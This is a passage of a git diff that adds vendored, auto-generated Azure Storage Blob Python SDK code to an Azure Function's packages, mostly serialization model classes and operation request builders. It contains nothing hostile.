+ :vartype if_none_match: str + :ivar if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a matching + value. 
+ :vartype if_tags: str + """ + + _attribute_map = { + 'if_modified_since': {'key': 'ifModifiedSince', 'type': 'rfc-1123'}, + 'if_unmodified_since': {'key': 'ifUnmodifiedSince', 'type': 'rfc-1123'}, + 'if_match': {'key': 'ifMatch', 'type': 'str'}, + 'if_none_match': {'key': 'ifNoneMatch', 'type': 'str'}, + 'if_tags': {'key': 'ifTags', 'type': 'str'}, + } + + def __init__( + self, + *, + if_modified_since: Optional[datetime.datetime] = None, + if_unmodified_since: Optional[datetime.datetime] = None, + if_match: Optional[str] = None, + if_none_match: Optional[str] = None, + if_tags: Optional[str] = None, + **kwargs + ): + """ + :keyword if_modified_since: Specify this header value to operate only on a blob if it has been + modified since the specified date/time. + :paramtype if_modified_since: ~datetime.datetime + :keyword if_unmodified_since: Specify this header value to operate only on a blob if it has not + been modified since the specified date/time. + :paramtype if_unmodified_since: ~datetime.datetime + :keyword if_match: Specify an ETag value to operate only on blobs with a matching value. + :paramtype if_match: str + :keyword if_none_match: Specify an ETag value to operate only on blobs without a matching + value. + :paramtype if_none_match: str + :keyword if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a + matching value. + :paramtype if_tags: str + """ + super(ModifiedAccessConditions, self).__init__(**kwargs) + self.if_modified_since = if_modified_since + self.if_unmodified_since = if_unmodified_since + self.if_match = if_match + self.if_none_match = if_none_match + self.if_tags = if_tags + + +class PageList(msrest.serialization.Model): + """the list of pages. + + :ivar page_range: + :vartype page_range: list[~azure.storage.blob.models.PageRange] + :ivar clear_range: + :vartype clear_range: list[~azure.storage.blob.models.ClearRange] + :ivar next_marker: + :vartype next_marker: str + """ + + _attribute_map = { + 'page_range': {'key': 'PageRange', 'type': '[PageRange]'}, + 'clear_range': {'key': 'ClearRange', 'type': '[ClearRange]'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + + def __init__( + self, + *, + page_range: Optional[List["PageRange"]] = None, + clear_range: Optional[List["ClearRange"]] = None, + next_marker: Optional[str] = None, + **kwargs + ): + """ + :keyword page_range: + :paramtype page_range: list[~azure.storage.blob.models.PageRange] + :keyword clear_range: + :paramtype clear_range: list[~azure.storage.blob.models.ClearRange] + :keyword next_marker: + :paramtype next_marker: str + """ + super(PageList, self).__init__(**kwargs) + self.page_range = page_range + self.clear_range = clear_range + self.next_marker = next_marker + + +class PageRange(msrest.serialization.Model): + """PageRange. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. + :vartype start: long + :ivar end: Required. + :vartype end: long + """ + + _validation = { + 'start': {'required': True}, + 'end': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}}, + 'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}}, + } + _xml_map = { + 'name': 'PageRange' + } + + def __init__( + self, + *, + start: int, + end: int, + **kwargs + ): + """ + :keyword start: Required. + :paramtype start: long + :keyword end: Required. 
+ :paramtype end: long + """ + super(PageRange, self).__init__(**kwargs) + self.start = start + self.end = end + + +class QueryFormat(msrest.serialization.Model): + """QueryFormat. + + All required parameters must be populated in order to send to Azure. + + :ivar type: Required. The quick query format type. Possible values include: "delimited", + "json", "arrow", "parquet". + :vartype type: str or ~azure.storage.blob.models.QueryFormatType + :ivar delimited_text_configuration: Groups the settings used for interpreting the blob data if + the blob is delimited text formatted. + :vartype delimited_text_configuration: ~azure.storage.blob.models.DelimitedTextConfiguration + :ivar json_text_configuration: json text configuration. + :vartype json_text_configuration: ~azure.storage.blob.models.JsonTextConfiguration + :ivar arrow_configuration: Groups the settings used for formatting the response if the response + should be Arrow formatted. + :vartype arrow_configuration: ~azure.storage.blob.models.ArrowConfiguration + :ivar parquet_text_configuration: Any object. + :vartype parquet_text_configuration: any + """ + + _validation = { + 'type': {'required': True}, + } + + _attribute_map = { + 'type': {'key': 'Type', 'type': 'str', 'xml': {'name': 'Type'}}, + 'delimited_text_configuration': {'key': 'DelimitedTextConfiguration', 'type': 'DelimitedTextConfiguration'}, + 'json_text_configuration': {'key': 'JsonTextConfiguration', 'type': 'JsonTextConfiguration'}, + 'arrow_configuration': {'key': 'ArrowConfiguration', 'type': 'ArrowConfiguration'}, + 'parquet_text_configuration': {'key': 'ParquetTextConfiguration', 'type': 'object'}, + } + + def __init__( + self, + *, + type: Union[str, "QueryFormatType"], + delimited_text_configuration: Optional["DelimitedTextConfiguration"] = None, + json_text_configuration: Optional["JsonTextConfiguration"] = None, + arrow_configuration: Optional["ArrowConfiguration"] = None, + parquet_text_configuration: Optional[Any] = None, + **kwargs + ): + """ + :keyword type: Required. The quick query format type. Possible values include: "delimited", + "json", "arrow", "parquet". + :paramtype type: str or ~azure.storage.blob.models.QueryFormatType + :keyword delimited_text_configuration: Groups the settings used for interpreting the blob data + if the blob is delimited text formatted. + :paramtype delimited_text_configuration: ~azure.storage.blob.models.DelimitedTextConfiguration + :keyword json_text_configuration: json text configuration. + :paramtype json_text_configuration: ~azure.storage.blob.models.JsonTextConfiguration + :keyword arrow_configuration: Groups the settings used for formatting the response if the + response should be Arrow formatted. + :paramtype arrow_configuration: ~azure.storage.blob.models.ArrowConfiguration + :keyword parquet_text_configuration: Any object. + :paramtype parquet_text_configuration: any + """ + super(QueryFormat, self).__init__(**kwargs) + self.type = type + self.delimited_text_configuration = delimited_text_configuration + self.json_text_configuration = json_text_configuration + self.arrow_configuration = arrow_configuration + self.parquet_text_configuration = parquet_text_configuration + + +class QueryRequest(msrest.serialization.Model): + """Groups the set of query request settings. + + Variables are only populated by the server, and will be ignored when sending a request. + + All required parameters must be populated in order to send to Azure. + + :ivar query_type: Required. The type of the provided query expression. 
Has constant value: + "SQL". + :vartype query_type: str + :ivar expression: Required. The query expression in SQL. The maximum size of the query + expression is 256KiB. + :vartype expression: str + :ivar input_serialization: + :vartype input_serialization: ~azure.storage.blob.models.QuerySerialization + :ivar output_serialization: + :vartype output_serialization: ~azure.storage.blob.models.QuerySerialization + """ + + _validation = { + 'query_type': {'required': True, 'constant': True}, + 'expression': {'required': True}, + } + + _attribute_map = { + 'query_type': {'key': 'QueryType', 'type': 'str', 'xml': {'name': 'QueryType'}}, + 'expression': {'key': 'Expression', 'type': 'str', 'xml': {'name': 'Expression'}}, + 'input_serialization': {'key': 'InputSerialization', 'type': 'QuerySerialization'}, + 'output_serialization': {'key': 'OutputSerialization', 'type': 'QuerySerialization'}, + } + _xml_map = { + 'name': 'QueryRequest' + } + + query_type = "SQL" + + def __init__( + self, + *, + expression: str, + input_serialization: Optional["QuerySerialization"] = None, + output_serialization: Optional["QuerySerialization"] = None, + **kwargs + ): + """ + :keyword expression: Required. The query expression in SQL. The maximum size of the query + expression is 256KiB. + :paramtype expression: str + :keyword input_serialization: + :paramtype input_serialization: ~azure.storage.blob.models.QuerySerialization + :keyword output_serialization: + :paramtype output_serialization: ~azure.storage.blob.models.QuerySerialization + """ + super(QueryRequest, self).__init__(**kwargs) + self.expression = expression + self.input_serialization = input_serialization + self.output_serialization = output_serialization + + +class QuerySerialization(msrest.serialization.Model): + """QuerySerialization. + + All required parameters must be populated in order to send to Azure. + + :ivar format: Required. + :vartype format: ~azure.storage.blob.models.QueryFormat + """ + + _validation = { + 'format': {'required': True}, + } + + _attribute_map = { + 'format': {'key': 'Format', 'type': 'QueryFormat'}, + } + + def __init__( + self, + *, + format: "QueryFormat", + **kwargs + ): + """ + :keyword format: Required. + :paramtype format: ~azure.storage.blob.models.QueryFormat + """ + super(QuerySerialization, self).__init__(**kwargs) + self.format = format + + +class RetentionPolicy(msrest.serialization.Model): + """the retention policy which determines how long the associated data should persist. + + All required parameters must be populated in order to send to Azure. + + :ivar enabled: Required. Indicates whether a retention policy is enabled for the storage + service. + :vartype enabled: bool + :ivar days: Indicates the number of days that metrics or logging or soft-deleted data should be + retained. All data older than this value will be deleted. + :vartype days: int + :ivar allow_permanent_delete: Indicates whether permanent delete is allowed on this storage + account. + :vartype allow_permanent_delete: bool + """ + + _validation = { + 'enabled': {'required': True}, + 'days': {'minimum': 1}, + } + + _attribute_map = { + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'days': {'key': 'Days', 'type': 'int'}, + 'allow_permanent_delete': {'key': 'AllowPermanentDelete', 'type': 'bool'}, + } + + def __init__( + self, + *, + enabled: bool, + days: Optional[int] = None, + allow_permanent_delete: Optional[bool] = None, + **kwargs + ): + """ + :keyword enabled: Required. 
Indicates whether a retention policy is enabled for the storage + service. + :paramtype enabled: bool + :keyword days: Indicates the number of days that metrics or logging or soft-deleted data should + be retained. All data older than this value will be deleted. + :paramtype days: int + :keyword allow_permanent_delete: Indicates whether permanent delete is allowed on this storage + account. + :paramtype allow_permanent_delete: bool + """ + super(RetentionPolicy, self).__init__(**kwargs) + self.enabled = enabled + self.days = days + self.allow_permanent_delete = allow_permanent_delete + + +class SequenceNumberAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar if_sequence_number_less_than_or_equal_to: Specify this header value to operate only on a + blob if it has a sequence number less than or equal to the specified. + :vartype if_sequence_number_less_than_or_equal_to: long + :ivar if_sequence_number_less_than: Specify this header value to operate only on a blob if it + has a sequence number less than the specified. + :vartype if_sequence_number_less_than: long + :ivar if_sequence_number_equal_to: Specify this header value to operate only on a blob if it + has the specified sequence number. + :vartype if_sequence_number_equal_to: long + """ + + _attribute_map = { + 'if_sequence_number_less_than_or_equal_to': {'key': 'ifSequenceNumberLessThanOrEqualTo', 'type': 'long'}, + 'if_sequence_number_less_than': {'key': 'ifSequenceNumberLessThan', 'type': 'long'}, + 'if_sequence_number_equal_to': {'key': 'ifSequenceNumberEqualTo', 'type': 'long'}, + } + + def __init__( + self, + *, + if_sequence_number_less_than_or_equal_to: Optional[int] = None, + if_sequence_number_less_than: Optional[int] = None, + if_sequence_number_equal_to: Optional[int] = None, + **kwargs + ): + """ + :keyword if_sequence_number_less_than_or_equal_to: Specify this header value to operate only on + a blob if it has a sequence number less than or equal to the specified. + :paramtype if_sequence_number_less_than_or_equal_to: long + :keyword if_sequence_number_less_than: Specify this header value to operate only on a blob if + it has a sequence number less than the specified. + :paramtype if_sequence_number_less_than: long + :keyword if_sequence_number_equal_to: Specify this header value to operate only on a blob if it + has the specified sequence number. + :paramtype if_sequence_number_equal_to: long + """ + super(SequenceNumberAccessConditions, self).__init__(**kwargs) + self.if_sequence_number_less_than_or_equal_to = if_sequence_number_less_than_or_equal_to + self.if_sequence_number_less_than = if_sequence_number_less_than + self.if_sequence_number_equal_to = if_sequence_number_equal_to + + +class SignedIdentifier(msrest.serialization.Model): + """signed identifier. + + All required parameters must be populated in order to send to Azure. + + :ivar id: Required. a unique id. + :vartype id: str + :ivar access_policy: An Access policy. + :vartype access_policy: ~azure.storage.blob.models.AccessPolicy + """ + + _validation = { + 'id': {'required': True}, + } + + _attribute_map = { + 'id': {'key': 'Id', 'type': 'str'}, + 'access_policy': {'key': 'AccessPolicy', 'type': 'AccessPolicy'}, + } + _xml_map = { + 'name': 'SignedIdentifier' + } + + def __init__( + self, + *, + id: str, + access_policy: Optional["AccessPolicy"] = None, + **kwargs + ): + """ + :keyword id: Required. a unique id. + :paramtype id: str + :keyword access_policy: An Access policy. 
+ :paramtype access_policy: ~azure.storage.blob.models.AccessPolicy + """ + super(SignedIdentifier, self).__init__(**kwargs) + self.id = id + self.access_policy = access_policy + + +class SourceModifiedAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar source_if_modified_since: Specify this header value to operate only on a blob if it has + been modified since the specified date/time. + :vartype source_if_modified_since: ~datetime.datetime + :ivar source_if_unmodified_since: Specify this header value to operate only on a blob if it has + not been modified since the specified date/time. + :vartype source_if_unmodified_since: ~datetime.datetime + :ivar source_if_match: Specify an ETag value to operate only on blobs with a matching value. + :vartype source_if_match: str + :ivar source_if_none_match: Specify an ETag value to operate only on blobs without a matching + value. + :vartype source_if_none_match: str + :ivar source_if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a + matching value. + :vartype source_if_tags: str + """ + + _attribute_map = { + 'source_if_modified_since': {'key': 'sourceIfModifiedSince', 'type': 'rfc-1123'}, + 'source_if_unmodified_since': {'key': 'sourceIfUnmodifiedSince', 'type': 'rfc-1123'}, + 'source_if_match': {'key': 'sourceIfMatch', 'type': 'str'}, + 'source_if_none_match': {'key': 'sourceIfNoneMatch', 'type': 'str'}, + 'source_if_tags': {'key': 'sourceIfTags', 'type': 'str'}, + } + + def __init__( + self, + *, + source_if_modified_since: Optional[datetime.datetime] = None, + source_if_unmodified_since: Optional[datetime.datetime] = None, + source_if_match: Optional[str] = None, + source_if_none_match: Optional[str] = None, + source_if_tags: Optional[str] = None, + **kwargs + ): + """ + :keyword source_if_modified_since: Specify this header value to operate only on a blob if it + has been modified since the specified date/time. + :paramtype source_if_modified_since: ~datetime.datetime + :keyword source_if_unmodified_since: Specify this header value to operate only on a blob if it + has not been modified since the specified date/time. + :paramtype source_if_unmodified_since: ~datetime.datetime + :keyword source_if_match: Specify an ETag value to operate only on blobs with a matching value. + :paramtype source_if_match: str + :keyword source_if_none_match: Specify an ETag value to operate only on blobs without a + matching value. + :paramtype source_if_none_match: str + :keyword source_if_tags: Specify a SQL where clause on blob tags to operate only on blobs with + a matching value. + :paramtype source_if_tags: str + """ + super(SourceModifiedAccessConditions, self).__init__(**kwargs) + self.source_if_modified_since = source_if_modified_since + self.source_if_unmodified_since = source_if_unmodified_since + self.source_if_match = source_if_match + self.source_if_none_match = source_if_none_match + self.source_if_tags = source_if_tags + + +class StaticWebsite(msrest.serialization.Model): + """The properties that enable an account to host a static website. + + All required parameters must be populated in order to send to Azure. + + :ivar enabled: Required. Indicates whether this account is hosting a static website. + :vartype enabled: bool + :ivar index_document: The default name of the index page under each directory. + :vartype index_document: str + :ivar error_document404_path: The absolute path of the custom 404 page. 
+ :vartype error_document404_path: str + :ivar default_index_document_path: Absolute path of the default index page. + :vartype default_index_document_path: str + """ + + _validation = { + 'enabled': {'required': True}, + } + + _attribute_map = { + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'index_document': {'key': 'IndexDocument', 'type': 'str'}, + 'error_document404_path': {'key': 'ErrorDocument404Path', 'type': 'str'}, + 'default_index_document_path': {'key': 'DefaultIndexDocumentPath', 'type': 'str'}, + } + + def __init__( + self, + *, + enabled: bool, + index_document: Optional[str] = None, + error_document404_path: Optional[str] = None, + default_index_document_path: Optional[str] = None, + **kwargs + ): + """ + :keyword enabled: Required. Indicates whether this account is hosting a static website. + :paramtype enabled: bool + :keyword index_document: The default name of the index page under each directory. + :paramtype index_document: str + :keyword error_document404_path: The absolute path of the custom 404 page. + :paramtype error_document404_path: str + :keyword default_index_document_path: Absolute path of the default index page. + :paramtype default_index_document_path: str + """ + super(StaticWebsite, self).__init__(**kwargs) + self.enabled = enabled + self.index_document = index_document + self.error_document404_path = error_document404_path + self.default_index_document_path = default_index_document_path + + +class StorageError(msrest.serialization.Model): + """StorageError. + + :ivar message: + :vartype message: str + """ + + _attribute_map = { + 'message': {'key': 'Message', 'type': 'str'}, + } + + def __init__( + self, + *, + message: Optional[str] = None, + **kwargs + ): + """ + :keyword message: + :paramtype message: str + """ + super(StorageError, self).__init__(**kwargs) + self.message = message + + +class StorageServiceProperties(msrest.serialization.Model): + """Storage Service Properties. + + :ivar logging: Azure Analytics Logging settings. + :vartype logging: ~azure.storage.blob.models.Logging + :ivar hour_metrics: a summary of request statistics grouped by API in hour or minute aggregates + for blobs. + :vartype hour_metrics: ~azure.storage.blob.models.Metrics + :ivar minute_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :vartype minute_metrics: ~azure.storage.blob.models.Metrics + :ivar cors: The set of CORS rules. + :vartype cors: list[~azure.storage.blob.models.CorsRule] + :ivar default_service_version: The default version to use for requests to the Blob service if + an incoming request's version is not specified. Possible values include version 2008-10-27 and + all more recent versions. + :vartype default_service_version: str + :ivar delete_retention_policy: the retention policy which determines how long the associated + data should persist. + :vartype delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy + :ivar static_website: The properties that enable an account to host a static website. 
+ :vartype static_website: ~azure.storage.blob.models.StaticWebsite + """ + + _attribute_map = { + 'logging': {'key': 'Logging', 'type': 'Logging'}, + 'hour_metrics': {'key': 'HourMetrics', 'type': 'Metrics'}, + 'minute_metrics': {'key': 'MinuteMetrics', 'type': 'Metrics'}, + 'cors': {'key': 'Cors', 'type': '[CorsRule]', 'xml': {'wrapped': True}}, + 'default_service_version': {'key': 'DefaultServiceVersion', 'type': 'str'}, + 'delete_retention_policy': {'key': 'DeleteRetentionPolicy', 'type': 'RetentionPolicy'}, + 'static_website': {'key': 'StaticWebsite', 'type': 'StaticWebsite'}, + } + + def __init__( + self, + *, + logging: Optional["Logging"] = None, + hour_metrics: Optional["Metrics"] = None, + minute_metrics: Optional["Metrics"] = None, + cors: Optional[List["CorsRule"]] = None, + default_service_version: Optional[str] = None, + delete_retention_policy: Optional["RetentionPolicy"] = None, + static_website: Optional["StaticWebsite"] = None, + **kwargs + ): + """ + :keyword logging: Azure Analytics Logging settings. + :paramtype logging: ~azure.storage.blob.models.Logging + :keyword hour_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :paramtype hour_metrics: ~azure.storage.blob.models.Metrics + :keyword minute_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :paramtype minute_metrics: ~azure.storage.blob.models.Metrics + :keyword cors: The set of CORS rules. + :paramtype cors: list[~azure.storage.blob.models.CorsRule] + :keyword default_service_version: The default version to use for requests to the Blob service + if an incoming request's version is not specified. Possible values include version 2008-10-27 + and all more recent versions. + :paramtype default_service_version: str + :keyword delete_retention_policy: the retention policy which determines how long the associated + data should persist. + :paramtype delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy + :keyword static_website: The properties that enable an account to host a static website. + :paramtype static_website: ~azure.storage.blob.models.StaticWebsite + """ + super(StorageServiceProperties, self).__init__(**kwargs) + self.logging = logging + self.hour_metrics = hour_metrics + self.minute_metrics = minute_metrics + self.cors = cors + self.default_service_version = default_service_version + self.delete_retention_policy = delete_retention_policy + self.static_website = static_website + + +class StorageServiceStats(msrest.serialization.Model): + """Stats for the storage service. + + :ivar geo_replication: Geo-Replication information for the Secondary Storage Service. + :vartype geo_replication: ~azure.storage.blob.models.GeoReplication + """ + + _attribute_map = { + 'geo_replication': {'key': 'GeoReplication', 'type': 'GeoReplication'}, + } + + def __init__( + self, + *, + geo_replication: Optional["GeoReplication"] = None, + **kwargs + ): + """ + :keyword geo_replication: Geo-Replication information for the Secondary Storage Service. + :paramtype geo_replication: ~azure.storage.blob.models.GeoReplication + """ + super(StorageServiceStats, self).__init__(**kwargs) + self.geo_replication = geo_replication + + +class UserDelegationKey(msrest.serialization.Model): + """A user delegation key. + + All required parameters must be populated in order to send to Azure. + + :ivar signed_oid: Required. The Azure Active Directory object ID in GUID format. + :vartype signed_oid: str + :ivar signed_tid: Required. 
The Azure Active Directory tenant ID in GUID format. + :vartype signed_tid: str + :ivar signed_start: Required. The date-time the key is active. + :vartype signed_start: ~datetime.datetime + :ivar signed_expiry: Required. The date-time the key expires. + :vartype signed_expiry: ~datetime.datetime + :ivar signed_service: Required. Abbreviation of the Azure Storage service that accepts the key. + :vartype signed_service: str + :ivar signed_version: Required. The service version that created the key. + :vartype signed_version: str + :ivar value: Required. The key as a base64 string. + :vartype value: str + """ + + _validation = { + 'signed_oid': {'required': True}, + 'signed_tid': {'required': True}, + 'signed_start': {'required': True}, + 'signed_expiry': {'required': True}, + 'signed_service': {'required': True}, + 'signed_version': {'required': True}, + 'value': {'required': True}, + } + + _attribute_map = { + 'signed_oid': {'key': 'SignedOid', 'type': 'str'}, + 'signed_tid': {'key': 'SignedTid', 'type': 'str'}, + 'signed_start': {'key': 'SignedStart', 'type': 'iso-8601'}, + 'signed_expiry': {'key': 'SignedExpiry', 'type': 'iso-8601'}, + 'signed_service': {'key': 'SignedService', 'type': 'str'}, + 'signed_version': {'key': 'SignedVersion', 'type': 'str'}, + 'value': {'key': 'Value', 'type': 'str'}, + } + + def __init__( + self, + *, + signed_oid: str, + signed_tid: str, + signed_start: datetime.datetime, + signed_expiry: datetime.datetime, + signed_service: str, + signed_version: str, + value: str, + **kwargs + ): + """ + :keyword signed_oid: Required. The Azure Active Directory object ID in GUID format. + :paramtype signed_oid: str + :keyword signed_tid: Required. The Azure Active Directory tenant ID in GUID format. + :paramtype signed_tid: str + :keyword signed_start: Required. The date-time the key is active. + :paramtype signed_start: ~datetime.datetime + :keyword signed_expiry: Required. The date-time the key expires. + :paramtype signed_expiry: ~datetime.datetime + :keyword signed_service: Required. Abbreviation of the Azure Storage service that accepts the + key. + :paramtype signed_service: str + :keyword signed_version: Required. The service version that created the key. + :paramtype signed_version: str + :keyword value: Required. The key as a base64 string. + :paramtype value: str + """ + super(UserDelegationKey, self).__init__(**kwargs) + self.signed_oid = signed_oid + self.signed_tid = signed_tid + self.signed_start = signed_start + self.signed_expiry = signed_expiry + self.signed_service = signed_service + self.signed_version = signed_version + self.value = value diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__init__.py new file mode 100644 index 0000000..dfe59c6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__init__.py @@ -0,0 +1,23 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. 
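+#
+# The re-exports below surface the low-level, auto-generated operation
+# groups. In normal use they are not instantiated directly; they are
+# reached through the hand-written azure.storage.blob client layer. A
+# minimal sketch of that path (the connection string, container name,
+# and blob name are hypothetical placeholders, not values from this repo):
+#
+#   from azure.storage.blob import BlobServiceClient
+#
+#   service = BlobServiceClient.from_connection_string("<connection-string>")
+#   blob = service.get_blob_client("example-container", "example.txt")
+#   blob.upload_blob(b"hello", overwrite=True)   # drives BlockBlobOperations
+#   print(blob.download_blob().readall())        # drives BlobOperations
+#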
+# -------------------------------------------------------------------------- + +from ._service_operations import ServiceOperations +from ._container_operations import ContainerOperations +from ._blob_operations import BlobOperations +from ._page_blob_operations import PageBlobOperations +from ._append_blob_operations import AppendBlobOperations +from ._block_blob_operations import BlockBlobOperations + +__all__ = [ + 'ServiceOperations', + 'ContainerOperations', + 'BlobOperations', + 'PageBlobOperations', + 'AppendBlobOperations', + 'BlockBlobOperations', +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..2daf6c2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_append_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_append_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..d504c2d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_append_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..5b7e846 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_block_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_block_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..bd278a5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_block_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_container_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_container_operations.cpython-39.pyc new file mode 100644 index 0000000..521f02d Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_container_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_page_blob_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_page_blob_operations.cpython-39.pyc new file mode 100644 index 0000000..5cc9100 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_page_blob_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_service_operations.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_service_operations.cpython-39.pyc new file mode 100644 index 0000000..855a482 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/__pycache__/_service_operations.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_append_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_append_blob_operations.py new file mode 100644 index 0000000..8c09a92 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_append_blob_operations.py @@ -0,0 +1,1051 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_create_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + blob_type = kwargs.pop('blob_type', "AppendBlob") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + 